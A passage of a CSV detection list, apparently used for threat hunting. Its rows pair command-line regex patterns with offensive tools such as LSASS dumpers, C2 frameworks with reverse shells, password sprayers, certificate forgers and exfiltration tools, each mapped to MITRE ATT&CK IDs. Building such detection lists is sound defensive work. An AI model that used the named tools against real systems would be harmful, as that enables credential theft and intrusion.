mysql-info.nse*",".{0,1000}\smysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-query.nse*",".{0,1000}\smysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-users.nse*",".{0,1000}\smysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-variables.nse*",".{0,1000}\smysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-vuln-cve2012-2122.nse*",".{0,1000}\smysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mystikal.py*",".{0,1000}\smystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "* mythic start*",".{0,1000}\smythic\sstart.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* mythic_container.Mythic*",".{0,1000}\smythic_container\.Mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* mythic_payloadtype_container*",".{0,1000}\smythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* mythic-cli*",".{0,1000}\smythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* -n *TotallyLegitTool*",".{0,1000}\s\-n\s.{0,1000}TotallyLegitTool.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -Name ""Test.PME"" *",".{0,1000}\s\-Name\s\""Test\.PME\""\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* --name covenant *",".{0,1000}\s\-\-name\scovenant\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* nanodump*",".{0,1000}\snanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* nanodump/*",".{0,1000}\snanodump\/.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* NativeDump.exe*",".{0,1000}\sNativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "* nat-pmp-info.nse*",".{0,1000}\snat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nat-pmp-mapport.nse*",".{0,1000}\snat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nbd-info.nse*",".{0,1000}\snbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NBNSBruteForce*",".{0,1000}\s\-NBNSBruteForce.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* nbns-interfaces.nse*",".{0,1000}\snbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nbnsspoof.py*",".{0,1000}\snbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* -NBNSTTL *",".{0,1000}\s\-NBNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* nbstat.nse*",".{0,1000}\snbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nc_srv.bat*",".{0,1000}\snc_srv\.bat.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* ncp-enum-users.nse*",".{0,1000}\sncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-serverinfo.nse*",".{0,1000}\sncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ndmp-fs-info.nse*",".{0,1000}\sndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ndmp-version.nse*",".{0,1000}\sndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* needs High Integrity Privileges to dump the relevant process!*",".{0,1000}\sneeds\sHigh\sIntegrity\sPrivileges\sto\sdump\sthe\srelevant\sprocess!.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "* nemesis_connector.py*",".{0,1000}\snemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* nemesis_db.py*",".{0,1000}\snemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* nemesis_reg_collect_parser.py*",".{0,1000}\snemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* nemesis-cli.py*",".{0,1000}\snemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --neo4j-host *",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-host *--neo4j-port*",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}\-\-neo4j\-port.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "* -neo4j-password *",".{0,1000}\s\-neo4j\-password\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-port *",".{0,1000}\s\-\-neo4j\-port\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-user *",".{0,1000}\s\-\-neo4j\-user\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* nessus-brute.nse*",".{0,1000}\snessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nessus-xmlrpc-brute.nse*",".{0,1000}\snessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-auth-bypass.nse*",".{0,1000}\snetbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-brute.nse*",".{0,1000}\snetbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-info.nse*",".{0,1000}\snetbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-version.nse*",".{0,1000}\snetbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --netcat-port *",".{0,1000}\s\-\-netcat\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* NetClone.exe*",".{0,1000}\sNetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* netripper*",".{0,1000}\snetripper.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --NewCertPath *.pfx --NewCertPassword *",".{0,1000}\s\-\-NewCertPath\s.{0,1000}\.pfx\s\-\-NewCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* NewLocalAdmin(*",".{0,1000}\sNewLocalAdmin\(.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* nexpose-brute.nse*",".{0,1000}\snexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-ls.nse*",".{0,1000}\snfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-showmount.nse*",".{0,1000}\snfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-statfs.nse*",".{0,1000}\snfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NiceRAT.py*",".{0,1000}\sNiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "* nightCrawler.ps1*",".{0,1000}\snightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* nikto.pl *",".{0,1000}\snikto\.pl\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "* nimcrypt*",".{0,1000}\snimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "* Ninja.py*",".{0,1000}\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "* nje-node-brute.nse*",".{0,1000}\snje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nje-pass-brute.nse*",".{0,1000}\snje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nla-redirection-host * --nla-redirection-port 